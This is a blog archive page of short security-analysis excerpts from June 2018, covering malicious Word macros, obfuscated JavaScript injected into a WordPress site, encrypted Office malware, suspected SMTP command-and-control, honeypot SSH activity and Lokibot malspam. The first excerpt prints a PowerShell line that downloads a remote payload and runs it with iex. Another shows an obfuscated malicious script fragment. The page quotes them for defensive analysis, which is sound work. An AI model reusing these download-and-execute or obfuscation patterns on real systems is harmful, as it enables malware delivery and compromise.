Archive by Author

PowerShell: ScriptBlock Logging… Or Not?, (Tue, Jun 19th)

Here is an interesting piece of PowerShell code which is executed from a Word document (SHA256: eecce8933177c96bd6bf88f7b03ef0cc7012c36801fd3d59afa065079c30a559[1]). The document is a classic one. Nothing fancy, spit executes the macro and spawns a first PowerShell command: powershell $h=New-Object -ComObject Msxml2.XMLHTTP $h.open(‘GET’,’hxxps://pastebin[.]com/raw/dqHSgxmE’,$false) $h.send() iex $h.responseText The following payload is downloaded from Pastebin: powershell -noP -sta -w 1 -enc […]

Leave a comment Continue Reading →

Malicious JavaScript Targeting Mobile Browsers, (Mon, Jun 18th)

A reader reported a suspicious piece of a Javascript code that was found on a website. In the meantime, the compromized website has been cleaned but it was running WordPress (again, I would say![1]).  The code was obfuscated, here is a copy: var _0x446d=[« x5Fx6Dx61x75x74x68x74x6Fx6Bx65x6E », »x69x6Ex64x65x78x4Fx66″, »x63x6Fx6Fx6Bx69x65″, »x75x73x65x72x41x67x65x6Ex74″, »x76x65x6Ex64x6Fx72″, »x6Fx70x65x72x61″, »x68x74x74x70x3Ax2Fx2Fx67x65x74x68x65x72x65x2Ex69x6Ex66x6Fx2Fx6Bx74x2Fx3Fx32x36x34x64x70x72x26″, »x67x6Fx6Fx67x6Cx65x62x6Fx74″, »x74x65x73x74″, »x73x75x62x73x74x72″, […]

Leave a comment Continue Reading →

Encrypted Office Documents, (Sun, Jun 17th)

Last I had to analyze a malicious, encrypted Excel document, with a twist. It was using the encrypted file format for OOXML files (.docx, .xlsx, …), I knew this because of oledump‘s report: When an OOXML file is encrypted, it is stored inside an OLE file. Stream EncryptedPackage contains the encrypted document. Malware authors will […]

Leave a comment Continue Reading →

Anomaly Detection & Threat Hunting with Anomalize, (Sat, Jun 16th)

When, in October and November‘s posts, I redefined DFIR under the premise of Deeper Functionality for Investigators in R, I discovered a “tip of the iceberg” scenario. To that end, I’d like to revisit the concept with an additional discovery and opportunity. In reality, this is really a case of DFIR (Deeper Functionality for Investigators in R) within the general practice of the original and paramount […]

Leave a comment Continue Reading →

SMTP Strangeness – Possible C2, (Fri, Jun 15th)

We received an email today that provided some interesting information from a reader (Bjorn) about some observed SMTP traffic that was unusal.  From the appearance it could be related to exfil or C2.  The domain in question is donotspamtoday.com whose IP is 185.14.30.147 and there is an DNS TXT entry for SPF.  The domain was registered […]

Leave a comment Continue Reading →

A Bunch of Compromized WordPress Sites, (Wed, Jun 13th)

A few days ago, one of our readers contacted reported an incident affecting his website based on WordPress. He performed quick checks by himself and found some pieces of evidence: The main index.php file was modified and some very obfuscated PHP code was added on top of it. A suspicious PHP file was dropped in every […]

Leave a comment Continue Reading →

From Microtik with Love, (Wed, Jun 13th)

We’ve found interesting new traffic within our Honeytrap agents, originating from servers within Russia only (to be specific, the netblock owned by NKS / NCNET Broadband). The username and password combination being used is root / root, and they are executing all of the following ssh commands: /ip cloud print help ifconfig uname -a show ip cat […]

Leave a comment Continue Reading →

Microsoft June 2018 Patch Tuesday, (Tue, Jun 12th)

June 2018 Security Updates Description CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG) Chakra Scripting Engine Memory Corruption Vulnerability %%cve:2018-8227%% No No – – Important 4.2 3.8 %%cve:2018-8229%% No No – – Critical 4.2 3.8 Cortana Elevation of Privilege Vulnerability %%cve:2018-8140%% No No Less Likely Less Likely Important […]

Leave a comment Continue Reading →

More malspam pushing Lokibot, (Mon, Jun 11th)

Introduction A tweet last week by @malwareunicorn reminded me I haven’t searched out any Loki-Bot malspam in a while. Shown above:  This tweet gave me a good chuckle. Loki-Bot (also spelled “Loki Bot” or “LokiBot”) is an information stealer that sends login credentials and other sensitive data from an infected Windows host to a server […]

Leave a comment Continue Reading →

What Systems Keep You Effective?, (Sat, Jun 9th)

Previously I discussed What’s On Your Not To Do List as a means to remain focused on priorities. I never fear running out of work in cybersecurity. Instead, I worry that our focus does not always stay on the most critical issues. Today I want to highlight several techniques I use to help remain effective. Saying no     Over and […]

Leave a comment Continue Reading →